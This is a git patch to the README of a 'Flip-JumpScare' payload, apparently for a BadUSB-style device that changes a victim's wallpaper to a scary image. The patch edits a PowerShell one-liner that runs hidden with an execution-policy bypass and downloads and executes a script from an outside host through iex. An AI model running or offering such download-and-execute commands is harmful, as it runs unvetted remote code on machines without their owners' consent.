From 78851cbf66b5c8d5c2829c2502e51df58674788f Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 1 Jan 2023 17:14:28 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-JumpScare/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-JumpScare/README.md b/Payloads/Flip-JumpScare/README.md index 6eed6ef..5e65351 100644 --- a/Payloads/Flip-JumpScare/README.md +++ b/Payloads/Flip-JumpScare/README.md @@ -37,7 +37,7 @@ At that point there desktop wallpaper will be changed to the scary image provide * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Exec Bypass iwr jakoby.lol/0tn | iex +powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex ```

(back to top)